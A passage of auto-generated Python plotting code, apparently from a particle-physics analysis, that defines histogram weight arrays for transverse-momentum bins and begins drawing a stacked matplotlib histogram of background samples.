# Creating weights for histo: y13_PT_9
y13_PT_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_10
y13_PT_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.95485645769,0.0,0.0,0.0,3.94542685761,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.948593127,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_11
y13_PT_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.864704003404,0.864567251347,0.0,0.861387369757,3.45748250094,0.0,1.73006049712,0.0,0.0,0.0,1.72887886713,0.0,1.72902729139,2.5870866435,0.86224506021,3.45412206052,0.861387369757,1.72563226668,0.861387369757,1.72956334792,1.72618993839,0.0,0.0,0.0,1.72796670642,0.0,0.0,1.72550401659,3.45722311874,3.4555385755,0.862981993841,0.862575628405,0.863198433872,2.59508426113,0.864105983346,1.7300691432,0.864567251347,2.59198752594,0.864823751516,2.59005801063,0.864823751516,0.0,0.864919578827,0.863198433872,1.72789033277,0.862434409211,1.72577348587,0.865644552057,1.7260962726,0.0,2.59120505633,0.0,0.0,2.59159124759,0.0,0.0,0.0,0.0,0.0,0.863850635987,0.0,0.864704003404,0.862434409211,0.0,0.862575628405,0.862321722058,0.0,0.0,0.0,0.865024340412,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862981993841,0.0,0.0,0.0,0.0,0.865024340412,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_12
y13_PT_12_weights = numpy.array([0.0,0.0,0.415405431739,1.45475582462,1.45385279881,0.934903917858,0.830163166054,0.83157252103,0.623413387643,1.03884478498,1.14170303091,0.934553959294,0.623284713678,0.830818364652,1.45353832657,0.934981093387,0.830356754015,1.45299593407,0.8304862935,0.830507498738,0.725923406044,1.14223287337,0.622957547139,1.55681937898,1.24583243712,1.03813736668,0.934523089083,0.935069376421,0.519237387602,1.34894168383,1.14351341012,1.454034558,0.830544139083,1.03879400781,0.830573134001,0.623195132364,0.72681027548,0.72723337048,0.414988539633,0.622699045182,0.415281950894,0.41518198334,0.207488211177,0.415680378575,0.311302856641,0.207940733854,0.415326092411,0.72795809918,0.207568560278,0.311245588071,0.623485658558,0.415307772239,0.207918807349,0.207685116964,0.207492971537,0.10395206118,0.207779602891,0.415158325795,0.207530044641,0.415353644796,0.103896985261,0.207964102893,0.0,0.415154863716,0.103514324469,0.20723230578,0.0,0.207676029005,0.207662180686,0.207479411724,0.103966746169,0.104014970055,0.0,0.0,0.0,0.103836312313,0.0,0.103811688271,0.0,0.0,0.10395206118,0.103761069779,0.0,0.0,0.0,0.0,0.103942179828,0.0,0.103973987686,0.103587864813,0.0,0.103720072985,0.0,0.0,0.0,0.0,0.0,0.103973136591,0.0,0.104111980415,0.0,0.10384853057,0.104111980415,0.0,0.0,0.1039572543,0.0,0.0,0.207751184987,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_13
y13_PT_13_weights = numpy.array([0.0,0.0,0.377215365226,0.378243809582,0.340406433675,0.453582877522,0.453908547775,0.302371516343,0.340057550029,0.302507610551,0.567013530783,0.302480983423,0.453924250952,0.189232919431,0.188774068023,0.15131322701,0.491688572945,0.22733943415,0.302581347212,0.377620689279,0.18921776245,0.378158011059,0.453608821902,0.22670381958,0.264578063817,0.302543113387,0.227004592331,0.151338329337,0.37792223581,0.11343902829,0.18915827244,0.15102761124,0.0755870643583,0.0756166955721,0.151096363849,0.189041044804,0.113539483111,0.340365013699,0.151236713846,0.0756410013603,0.0755334232132,0.0378816406616,0.0755660357549,0.075526937118,0.0377518049668,0.226620023782,0.0378559011049,0.113524166823,0.113517498662,0.151277200734,0.0377988689838,0.151200323438,0.0378199203453,0.113495286631,0.0,0.113416565918,0.0756445744022,0.037811135669,0.0378751773247,0.113278833118,0.0377751321512,0.113511331182,0.15113450664,0.0757032906323,0.0,0.0378457054185,0.0378875578011,0.113497562454,0.0376688284649,0.0756174921101,0.0,0.0,0.0754539287202,0.0,0.0376688284649,0.0,0.0,0.113572550818,0.113442783397,0.0378656871433,0.0,0.0,0.0378575852139,0.0377671440129,0.0,0.0378199203453,0.0378457054185,0.0378575852139,0.0,0.0378457054185,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0377988689838,0.0,0.0,0.0,0.0,0.0,0.0378021234105,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0376610906671,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378656871433,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_14
y13_PT_14_weights = numpy.array([0.0,0.0,0.116736023473,0.0955217010204,0.20153625086,0.159176455988,0.106111447748,0.201548947429,0.0954254379408,0.116760320089,0.116678225227,0.148423327499,0.169654011212,0.137893297931,0.265264516078,0.307751998038,0.169721101038,0.148640900527,0.10611531443,0.138018820832,0.14850383529,0.159232436316,0.0742866600756,0.169638573338,0.106033089716,0.0848648356112,0.116701382038,0.0954570350847,0.0743192094622,0.148545820536,0.0848901133264,0.0424490604109,0.127292672552,0.0318250040909,0.0424693749217,0.0424424091399,0.0318519121609,0.0318437459584,0.0317922238575,0.0318636997713,0.0424261777304,0.0424217050753,0.031818525955,0.0530771276926,0.0318457514393,0.0318408026628,0.0,0.0212045836066,0.0212190692379,0.0212327324777,0.0318204304403,0.0318491852841,0.0423917527142,0.0212298468938,0.0424636037539,0.0211705625721,0.0318461409931,0.0,0.0,0.0318345120899,0.0212292986329,0.0,0.0318147025563,0.0105954010289,0.0106161685764,0.0106079634185,0.0318389270333,0.021216169226,0.0105821460991,0.021196965665,0.0,0.0212325304869,0.0106163604677,0.0,0.0106099111876,0.0,0.0424638778843,0.0106015646361,0.0,0.0318239508527,0.021193387541,0.0106200569007,0.0,0.0212011786175,0.0106099111876,0.0,0.0106140520006,0.0,0.010588048561,0.0106050201229,0.0,0.010588048561,0.021160708303,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106218906893,0.0,0.0106050201229,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106199284922,0.0,0.0106358554727,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106129554787,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.010588048561,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_15
y13_PT_15_weights = numpy.array([0.0,0.0,0.0228252502637,0.0170665358471,0.0171468676969,0.0171039472206,0.00570723111907,0.00570723111907,0.00571686207685,0.00575000976816,0.0229268118824,0.0114364410323,0.0114157564119,0.0114455800267,0.0056668369409,0.0113737267881,0.0114221607994,0.0,0.00570977514566,0.011466871845,0.0057587144166,0.0171143582283,0.00565686027916,0.00576110775172,0.00565686027916,0.0,0.0114380410211,0.00570610979725,0.0,0.00570356133857,0.0,0.011467740537,0.0,0.00568977750116,0.0,0.00571145934444,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00565686027916,0.00576110775172,0.0057952881228,0.0,0.0,0.0,0.00574324194831,0.00570356133857,0.0,0.0,0.0,0.0,0.00574574165387,0.0,0.00568977750116,0.0,0.0,0.0,0.0,0.00575000976816,0.0,0.0,0.00572878443139,0.00576830548546,0.00570610979725,0.0,0.00570977514566,0.0,0.0,0.0,0.0,0.0,0.00567245241421,0.00571686207685,0.0,0.0,0.0,0.0,0.0,0.00565686027916,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0056668369409,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00572416618104,0.0,0.0,0.0,0.00567245241421,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00571686207685,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_16
y13_PT_16_weights = numpy.array([0.0,0.0,0.0,0.00135514604284,0.00202941842518,0.000677464239286,0.00203268116737,0.00203176586712,0.00135434955839,0.00270802404675,0.0,0.00135571225854,0.00135453810446,0.00338597278882,0.00135481211706,0.000675013573414,0.000675579644748,0.0,0.00135672962776,0.0,0.0,0.0006770517767,0.000675013573414,0.00203198963927,0.0,0.000677876124396,0.000678638393368,0.000675761261105,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677572660498,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000676887629007,0.0,0.0,0.0,0.0,0.0,0.000675761261105,0.0,0.000676507649474,0.0,0.000674995094166,0.000677876124396,0.00135404262963,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677831369968,0.0,0.0,0.0,0.000679381605616,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675013573414,0.0,0.0,0.0,0.000678638393368,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675579644748,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights,\
